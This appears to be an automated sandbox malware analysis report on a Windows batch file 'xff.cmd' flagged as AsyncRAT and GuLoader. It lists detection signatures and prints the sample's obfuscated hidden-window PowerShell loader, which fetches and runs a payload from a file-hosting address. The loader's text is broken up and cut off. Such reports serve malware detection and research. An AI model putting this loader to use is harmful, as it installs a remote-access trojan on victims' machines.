Windows
Analysis Report
xff.cmd
Overview
General Information
Detection
AsyncRAT, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected AsyncRAT
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 5728 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\xff.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 3360 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5700 cmdline:
powershell .exe -wind owstyle hi dden "$Las soing = 1; $Rasophore ='Sub';$Ra sophore+=' strin';$Ra sophore+=' g';Functio n Ugedagen s($Outdure ){$Frys=$O utdure.Len gth-$Lasso ing;For($I nterproduc ing=5;$Int erproducin g -lt $Fry s;$Interpr oducing+=6 ){$Unleche rous+=$Out dure.$Raso phore.Invo ke( $Inter producing, $Lassoing );}$Unlech erous;}fun ction Semu ljegrynets ($Barbariz ed){. ($adenoncu s) ($Barba rized);}$C urrycombin g=Ugedagen s 'ChronM, jerno istn zDes ei .r dmlSanktlW lliaLevul /Outca5Ave rr..eman0U forl Ort,g (HandlWSen dei Precn, niffd,edeo o Bor wDio xas W,gg K o,svNCross TInope Ove rl1 indr0K lamm.Op.ak 0Mavel;Ins tr Ro ndWn onfaiBeg.e nFlygt6Tot aq4Lufth;B o.ti Radix Fylgj6 G.n n4Tachy;ha ss Ek.pr Sy.ev lndi : iece1Til st2J ntj1P isto.Antid 0Bavn.)Pla nt oraGKi bose,odlic Re,ulk,ver foFli o/Su ccu2N.ntr0 Pulve1hj.e j0Forfa0ub eta1 Ekst0 Fort1Fl,p p LeddFReb ediTorskrs elvgehumat f,robyoBar vexSkjo /D ress1,ydro 2urtid1 ce nt.Begal0O pera ';$Hu aco=Ugedag ens ' Zo,l USkaloskrn ereRe rorD ema,-Storm AEmpreg Di sseLandsnM artetM tap ';$Fluern es=Ugedage ns 'Serv h CathatUna tt Su,ephe ,ges cevi: Du,le/Sil, n/ApprewDi letwA,vaew Plkke. Mil is La,reFa rmanLadedd CrystsNonh .pEje.ta N ivecCurn.e Hande.Maad gcCiceroch alomAston/ Anen,pV.rm trLyzetoAr ,th/Iodocd LinielKom. e/AfskewMu lti4Homebe Etabl2Pree nq Udadb K .st ';$Ast rographer= Ugedagens 'Homol>Fos si ';$aden oncus=Uged agens 'Afm nsi ExhoeS v,nfxInku. ';$Minuss ernes='Oli eraffinade riets';$Om skrivelses = Ugedage ns ' V,rde oplacPopl ,hFi ucoBr onc Svog%B .lthaKirop p Svamp De ,adOut aaU ,trytTorre a,push%Sho dd\SyndeBS .mshe,akse vSmileoSma lngAlumitU nderePolem sDeam,1Cer vi4Dispe0Q uadr. Me,l O Sv tuint egtAnt.s V ,let&St,ll &Canto For .oeOmlydcS tuddhFaktu oAmts Ordr etDire. '; Semuljegry nets (Uged agens 'Re, et$ lectg DirelOrtho oS rapb Tr anaSequelS merg:Still ARe.idpAss aypv.rdelB lreraFol.e uPlinksNeu roeM tenr Expls ode= Ka.ao( Har dcUn elmPh agodGasco Nonre/Girl ,clikvi Jo rdr$UndskO Maku mPant os Bli k M or.rretsbi ForsvChar leH,athlAs ylssDistie osteosTant e)Udski ') ;Semuljegr ynets (Uge dagens 'Ne tts$ C.okg elevtlSkei goMisemb e lveaRegovl Fa,il:litt oF pr.moEx panr S brv Cons,aBesk .yKandi= S ubp$ HopoF BjrgilInte guTapp,eTo othr.pegen Impe.eTegn es Hyst.Be s as,igtip fungulS,an di U jetDo k m(Punkt$ RespeA Kr. dsAdnottG, derrS,mmeo ZuluegBrom ,rs.ranaEf terpKonflh fhne.umph rRling) .n sl ');$Flu ernes=$For vay[0];$Un derabyss= (Ugedagens 'Bogka$ry gergRugerl UdsmyoOffe bAcridaSk ftelSkift: VegetF Ga eeS.rigepr essrBlodsi Em ee Tet r= N.nrN D ybte Te,sw Fo,ho-Chav eO ymidbH terj Ove.e Rullec kul ,tUdfri St .tiSDiv,ry TruansMeli lt FabiePh ilom Mark.